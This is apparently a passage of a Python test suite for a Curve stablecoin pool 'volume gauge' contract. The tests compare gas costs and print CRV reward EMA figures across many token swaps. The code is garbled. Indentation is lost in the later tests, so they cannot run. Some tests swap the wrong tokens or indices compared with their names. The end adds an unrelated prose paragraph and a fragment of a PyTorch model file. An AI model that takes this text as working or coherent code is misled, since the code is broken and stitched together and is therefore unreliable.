        newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
        price_v_ema = newvolume / newamount
        print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
        print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
        print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")


def test_exchange_yusdt_to_ydai(_yvolgauge, ypool, yUSDT, tracker, accounts):
    for i in range(5):
        print("Attempt #" + str(i + 1) + " .....")
        last_reward_amount = tracker.rewardAmount()
        tx = _yvolgauge.exchange(2, 0, 50 * 10 ** 6, 0, {'from': accounts[0]})
        vgas = tx.gas_used
        print("VGaugeGas : " + str(vgas) + " Unit")
        tx = ypool.exchange(2, 0, 50 * 10 ** 6, 0, {'from': accounts[0]})
        print("OriginGas : " + str(tx.gas_used) + " Unit")
        print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
        current_reward_amount = tracker.rewardAmount()
        lastvolumedata = tracker.lastVolumeData(yUSDT)
        last_volume = lastvolumedata[0]
        last_amount = lastvolumedata[1]
        currentvolumedata = tracker.currentVolumeData(yUSDT)
        current_volume = currentvolumedata[0]
        current_amount = currentvolumedata[1]
        newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
        newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
        price_v_ema = newvolume / newamount
        print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
        print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
        print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_ydai_to_ytusd(_yvolgauge, ypool, yDAI, tracker, accounts):
    for i in range(5):
        print("Attempt #" + str(i + 1) + " .....")
        last_reward_amount = tracker.rewardAmount()
        tx = _yvolgauge.exchange(0, 3, 50 * 10 ** 18, 0, {'from': accounts[0]})
        vgas = tx.gas_used
        print("VGaugeGas : " + str(vgas) + " Unit")
        tx = ypool.exchange(0, 3, 50 * 10 ** 18, 0, {'from': accounts[0]})
        print("OriginGas : " + str(tx.gas_used) + " Unit")
        print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
        current_reward_amount = tracker.rewardAmount()
        lastvolumedata = tracker.lastVolumeData(yDAI)
        last_volume = lastvolumedata[0]
        last_amount = lastvolumedata[1]
        currentvolumedata = tracker.currentVolumeData(yDAI)
        current_volume = currentvolumedata[0]
        current_amount = currentvolumedata[1]
        newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
        newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
        price_v_ema = newvolume / newamount
        print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
        print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
        print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")


def test_exchange_ytusd_to_ydai(_yvolgauge, ypool, yTUSD, tracker, accounts):
    for i in range(5):
        print("Attempt #" + str(i + 1) + " .....")
        last_reward_amount = tracker.rewardAmount()
        tx = _yvolgauge.exchange(3, 0, 50 * 10 ** 18, 0, {'from': accounts[0]})
        vgas = tx.gas_used
        print("VGaugeGas : " + str(vgas) + " Unit")
        tx = ypool.exchange(3, 0, 50 * 10 ** 18, 0, {'from': accounts[0]})
        print("OriginGas : " + str(tx.gas_used) + " Unit")
        print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
        current_reward_amount = tracker.rewardAmount()
        lastvolumedata = tracker.lastVolumeData(yTUSD)
        last_volume = lastvolumedata[0]
        last_amount = lastvolumedata[1]
        currentvolumedata = tracker.currentVolumeData(yTUSD)
        current_volume = currentvolumedata[0]
        current_amount = currentvolumedata[1]
        newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
        newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
        price_v_ema = newvolume / newamount
        print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
        print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
        print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")


def test_exchange_yusdc_to_yusdt(_yvolgauge, ypool, yUSDC, tracker, accounts):
    for i in range(5):
        print("Attempt #" + str(i + 1) + " .....")
        last_reward_amount = tracker.rewardAmount()
        tx = _yvolgauge.exchange(1, 2, 50 * 10 ** 6, 0, {'from': accounts[0]})
        vgas = tx.gas_used
        print("VGaugeGas : " + str(vgas) + " Unit")
        tx = ypool.exchange(1, 2, 50 * 10 ** 6, 0, {'from': accounts[0]})
        print("OriginGas : " + str(tx.gas_used) + " Unit")
        print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
        current_reward_amount = tracker.rewardAmount()
        lastvolumedata = tracker.lastVolumeData(yUSDC)
        last_volume = lastvolumedata[0]
        last_amount = lastvolumedata[1]
        currentvolumedata = tracker.currentVolumeData(yUSDC)
        current_volume = currentvolumedata[0]
        current_amount = currentvolumedata[1]
        newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
        newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
        price_v_ema = newvolume / newamount
        print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
        print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
        print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")


def test_exchange_yusdt_to_yusdc(_yvolgauge, ypool, yUSDT, tracker, accounts):
    for i in range(5):
        print("Attempt #" + str(i + 1) + " .....")
        last_reward_amount = tracker.rewardAmount()
        tx = _yvolgauge.exchange(2, 1, 50 * 10 ** 6, 0, {'from': accounts[0]})
        vgas = tx.gas_used
        print("VGaugeGas : " + str(vgas) + " Unit")
        tx = ypool.exchange(2, 1, 50 * 10 ** 6, 0, {'from': accounts[0]})
        print("OriginGas : " + str(tx.gas_used) + " Unit")
        print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
        current_reward_amount = tracker.rewardAmount()
        lastvolumedata = tracker.lastVolumeData(yUSDT)
        last_volume = lastvolumedata[0]
        last_amount = lastvolumedata[1]
        currentvolumedata = tracker.currentVolumeData(yUSDT)
        current_volume = currentvolumedata[0]
        current_amount = currentvolumedata[1]
        newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
        newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
        price_v_ema = newvolume / newamount
        print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
        print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
        print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_yusdc_to_ytusd(_yvolgauge, ypool, yUSDC, tracker, accounts):
    for i in range(5):
        print("Attempt #" + str(i + 1) + " .....")
        last_reward_amount = tracker.rewardAmount()
        tx = _yvolgauge.exchange(1, 3, 50 * 10 ** 6, 0, {'from': accounts[0]})
        vgas = tx.gas_used
        print("VGaugeGas : " + str(vgas) + " Unit")
        tx = ypool.exchange(1, 3, 50 * 10 ** 6, 0, {'from': accounts[0]})
        print("OriginGas : " + str(tx.gas_used) + " Unit")
        print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
        current_reward_amount = tracker.rewardAmount()
        lastvolumedata = tracker.lastVolumeData(yUSDC)
        last_volume = lastvolumedata[0]
        last_amount = lastvolumedata[1]
        currentvolumedata = tracker.currentVolumeData(yUSDC)
        current_volume = currentvolumedata[0]
        current_amount = currentvolumedata[1]
        newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
        newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
        price_v_ema = newvolume / newamount
        print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
        print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
        print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")


def test_exchange_ytusd_to_yusdc(_yvolgauge, ypool, yTUSD, tracker, accounts):
    for i in range(5):
        print("Attempt #" + str(i + 1) + " .....")
        last_reward_amount = tracker.rewardAmount()
        tx = _yvolgauge.exchange(3, 1, 50 * 10 ** 18, 0, {'from': accounts[0]})
        vgas = tx.gas_used
        print("VGaugeGas : " + str(vgas) + " Unit")
        tx = ypool.exchange(3, 1, 50 * 10 ** 18, 0, {'from': accounts[0]})
        print("OriginGas : " + str(tx.gas_used) + " Unit")
        print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
        current_reward_amount = tracker.rewardAmount()
        lastvolumedata = tracker.lastVolumeData(yTUSD)
        last_volume = lastvolumedata[0]
        last_amount = lastvolumedata[1]
        currentvolumedata = tracker.currentVolumeData(yTUSD)
        current_volume = currentvolumedata[0]
        current_amount = currentvolumedata[1]
        newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
        newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
        price_v_ema = newvolume / newamount
        print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
        print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
        print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")


def test_exchange_yusdt_to_ytusd(_yvolgauge, ypool, yUSDT, tracker, accounts):
    for i in range(5):
        print("Attempt #" + str(i + 1) + " .....")
        last_reward_amount = tracker.rewardAmount()
        tx = _yvolgauge.exchange(2, 3, 50 * 10 ** 6, 0, {'from': accounts[0]})
        vgas = tx.gas_used
        print("VGaugeGas : " + str(vgas) + " Unit")
        tx = ypool.exchange(2, 3, 50 * 10 ** 6, 0, {'from': accounts[0]})
        print("OriginGas : " + str(tx.gas_used) + " Unit")
        print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
        current_reward_amount = tracker.rewardAmount()
        lastvolumedata = tracker.lastVolumeData(yUSDT)
        last_volume = lastvolumedata[0]
        last_amount = lastvolumedata[1]
        currentvolumedata = tracker.currentVolumeData(yUSDT)
        current_volume = currentvolumedata[0]
        current_amount = currentvolumedata[1]
        newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
        newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
        price_v_ema = newvolume / newamount
        print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
        print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
        print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")


def test_exchange_ytusd_to_yusdt(_yvolgauge, ypool, yTUSD, tracker, accounts):
    for i in range(5):
        print("Attempt #" + str(i + 1) + " .....")
        last_reward_amount = tracker.rewardAmount()
        tx = _yvolgauge.exchange(3, 2, 50 * 10 ** 18, 0, {'from': accounts[0]})
        vgas = tx.gas_used
        print("VGaugeGas : " + str(vgas) + " Unit")
        tx = ypool.exchange(3, 2, 50 * 10 ** 18, 0, {'from': accounts[0]})
        print("OriginGas : " + str(tx.gas_used) + " Unit")
        print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
        current_reward_amount = tracker.rewardAmount()
        lastvolumedata = tracker.lastVolumeData(yTUSD)
        last_volume = lastvolumedata[0]
        last_amount = lastvolumedata[1]
        currentvolumedata = tracker.currentVolumeData(yTUSD)
        current_volume = currentvolumedata[0]
        current_amount = currentvolumedata[1]
        newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
        newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
        price_v_ema = newvolume / newamount
        print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
        print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
        print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_underlying_dai_to_usdc(_yvolgauge, ypool, DAI, tracker, accounts):
    for i in range(5):
        print("Attempt #" + str(i + 1) + " .....")
        last_reward_amount = tracker.rewardAmount()
        tx = _yvolgauge.exchange_underlying(0, 1, 50 * 10 ** 18, 0, {'from': accounts[0]})
        vgas = tx.gas_used
        print("VGaugeGas : " + str(vgas) + " Unit")
        tx = ypool.exchange_underlying(0, 1, 50 * 10 ** 18, 0, {'from': accounts[0]})
        print("OriginGas : " + str(tx.gas_used) + " Unit")
        print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
        current_reward_amount = tracker.rewardAmount()
        lastvolumedata = tracker.lastVolumeData(DAI)
        last_volume = lastvolumedata[0]
        last_amount = lastvolumedata[1]
        currentvolumedata = tracker.currentVolumeData(DAI)
        current_volume = currentvolumedata[0]
        current_amount = currentvolumedata[1]
        newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
        newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
        price_v_ema = newvolume / newamount
        print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
        print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
        print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")


def test_exchange_underlying_usdc_to_dai(_yvolgauge, ypool, USDC, tracker, accounts):
    for i in range(5):
        print("Attempt #" + str(i + 1) + " .....")
        last_reward_amount = tracker.rewardAmount()
        tx = _yvolgauge.exchange_underlying(1, 0, 50 * 10 ** 6, 0, {'from': accounts[0]})
        vgas = tx.gas_used
        print("VGaugeGas : " + str(vgas) + " Unit")
        tx = ypool.exchange_underlying(1, 0, 50 * 10 ** 6, 0, {'from': accounts[0]})
        print("OriginGas : " + str(tx.gas_used) + " Unit")
        print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
        current_reward_amount = tracker.rewardAmount()
        lastvolumedata = tracker.lastVolumeData(USDC)
        last_volume = lastvolumedata[0]
        last_amount = lastvolumedata[1]
        currentvolumedata = tracker.currentVolumeData(USDC)
        current_volume = currentvolumedata[0]
        current_amount = currentvolumedata[1]
        newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
        newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
        price_v_ema = newvolume / newamount
        print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
        print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
        print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")


def test_exchange_underlying_dai_to_usdt(_yvolgauge, ypool, DAI, tracker, accounts):
    for i in range(5):
        print("Attempt #" + str(i + 1) + " .....")
        last_reward_amount = tracker.rewardAmount()
        tx = _yvolgauge.exchange_underlying(0, 2, 50 * 10 ** 18, 0, {'from': accounts[0]})
        vgas = tx.gas_used
        print("VGaugeGas : " + str(vgas) + " Unit")
        tx = ypool.exchange_underlying(0, 2, 50 * 10 ** 18, 0, {'from': accounts[0]})
        print("OriginGas : " + str(tx.gas_used) + " Unit")
        print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
        current_reward_amount = tracker.rewardAmount()
        lastvolumedata = tracker.lastVolumeData(DAI)
        last_volume = lastvolumedata[0]
        last_amount = lastvolumedata[1]
        currentvolumedata = tracker.currentVolumeData(DAI)
        current_volume = currentvolumedata[0]
        current_amount = currentvolumedata[1]
        newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
        newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
        price_v_ema = newvolume / newamount
        print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
        print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
        print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")


def test_exchange_underlying_usdt_to_dai(_yvolgauge, ypool, USDT, tracker, accounts):
    for i in range(5):
        print("Attempt #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _yvolgauge.exchange_underlying(2, 0, 50 * 10 ** 6, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = ypool.exchange_underlying(2, 0, 50 * 10 ** 6, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(USDT)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(USDT)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_underlying_dai_to_tusd(_yvolgauge, ypool, DAI, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _yvolgauge.exchange_underlying(0, 3, 50 * 10 ** 18, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = ypool.exchange_underlying(0, 3, 50 * 10 ** 18, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(DAI)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(DAI)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_underlying_tusd_to_dai(_yvolgauge, ypool, TUSD, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _yvolgauge.exchange_underlying(3, 0, 50 * 10 ** 18, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = ypool.exchange_underlying(3, 0, 50 * 10 ** 18, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(TUSD)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(TUSD)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_underlying_usdc_to_usdt(_yvolgauge, ypool, USDC, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _yvolgauge.exchange_underlying(1, 2, 50 * 10 ** 6, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = ypool.exchange_underlying(1, 2, 50 * 10 ** 6, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(USDC)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(USDC)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_underlying_usdt_to_usdc(_yvolgauge, ypool, USDT, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _yvolgauge.exchange_underlying(2, 1, 50 * 10 ** 6, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = ypool.exchange_underlying(2, 1, 50 * 10 ** 6, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(USDT)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(USDT)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_underlying_usdc_to_tusd(_yvolgauge, ypool, USDC, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _yvolgauge.exchange_underlying(1, 3, 50 * 10 ** 6, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = ypool.exchange_underlying(1, 3, 50 * 10 ** 6, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(USDC)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(USDC)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_underlying_tusd_to_usdc(_yvolgauge, ypool, TUSD, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _yvolgauge.exchange_underlying(3, 1, 50 * 10 ** 18, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = ypool.exchange_underlying(3, 1, 50 * 10 ** 18, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(TUSD)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(TUSD)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_underlying_usdt_to_tusd(_yvolgauge, ypool, USDC, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _yvolgauge.exchange_underlying(1, 3, 50 * 10 ** 6, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = ypool.exchange_underlying(1, 3, 50 * 10 ** 6, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(USDC)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(USDC)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_underlying_tusd_to_usdt(_yvolgauge, ypool, TUSD, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _yvolgauge.exchange_underlying(3, 1, 50 * 10 ** 18, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = ypool.exchange_underlying(3, 1, 50 * 10 ** 18, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(TUSD)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(TUSD)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
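The reward check in the tests above hinges on a volume-weighted EMA price. Below is a minimal standalone sketch of that arithmetic; the `alpha`/`denominator` defaults are illustrative placeholders, not the suite's actual `ALPHA`/`DENOMINATOR` constants.

```python
def ema_price(last_volume, last_amount, current_volume, current_amount,
              alpha=9000, denominator=10000):
    # Blend the previous EMA snapshot with the current window, then divide
    # volume by amount to get a price-by-volume estimate.
    new_volume = alpha * last_volume + (denominator - alpha) * current_volume
    new_amount = alpha * last_amount + (denominator - alpha) * current_amount
    return new_volume / new_amount

# If both the snapshot and the current window imply a price of 2,
# the blended estimate is still 2.
print(ema_price(100, 50, 200, 100))  # 2.0
```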

# model_defs.py (dzy18/Adaptive-Bound-Learning, BSD-2-Clause)
import torch.nn as nn
class Flatten(nn.Module):
    def forward(self, x):
        return x.view(x.size(0), -1)


